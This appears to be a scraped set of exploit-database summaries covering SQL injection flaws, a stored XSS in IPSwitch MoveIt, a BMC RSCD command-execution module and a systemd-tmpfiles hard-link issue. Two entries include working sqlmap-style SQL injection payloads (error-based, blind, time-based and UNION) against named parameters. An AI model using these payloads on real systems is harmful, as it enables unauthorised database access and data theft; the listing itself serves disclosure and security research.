The vulnerability allows an attacker to inject SQL commands into the vulnerable application. An attacker can send a specially crafted request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can lead to the manipulation or disclosure of data.
IPSwitch MoveIt v8.1 is affected by a stored cross-site scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks.
SQL injection on [route] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/index.php?route=property/category Parameter: route (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: route=property/category'||(SELECT 'coKq' FROM DUAL WHERE 3062=3062 AND (SELECT 7059 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(7059=7059,1))),0x7176717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&filter_propertystatus=1&filter_propertycategory=63&filter_city=any&filter_address=any&filter_country_id=223&filter_zone_id=&filter_range=1;10&
SQL injection on [search_browse_product] POST parameter. The exploit uses boolean-based blind, error-based, AND/OR time-based blind and UNION query payloads.
The vulnerability allows an attacker to inject SQL commands into the vulnerable application. An attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in the application's database. This can compromise the data and the security of the application.
This module exploits a weak access control check in the BMC Server Automation RSCD agent that allows arbitrary operating system commands to be executed without authentication. Note: Under Windows, non-PowerShell commands may need to be prefixed with 'cmd /c'.
Before version 237, the systemd-tmpfiles program will change the permissions and ownership of hard links. If the administrator disables the fs.protected_hardlinks sysctl, then an attacker can create hard links to sensitive files and subvert systemd-tmpfiles, particularly with 'Z' type entries.
This exploit allows an attacker to retrieve Windows system users with BMC BladeLogic RSCD agent. It was tested against v8.3.00.64 (Windows version) and is based on the Linux BMC getUsers exploit by ERNW.
The vulnerability allows an attacker to inject SQL commands. The attacker can exploit the vulnerability by sending a malicious SQL query to the vulnerable parameter. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability allows an attacker to inject SQL commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_cpeventcalendar&task=load&id=[SQL] Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=com_cpeventcalendar&task=load&id=1 AND 6741=6741 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_cpeventcalendar&task=load&id=1 AND (SELECT 7531 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(7531=7531,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query - comment) Payload: option=com_cpeventcalendar&task=load&id=1 AND 3954=BENCHMARK(5000000,MD5(0x4573626a))# Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: option=com_cpeventcalendar&task=load&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a707671,0x4a61716b6d59557a4f5a496f7676584d57444e514d4d78626d42546e786d79747350424271687555,0x717a6a7a71),NULL,NULL,NULL-- cJFi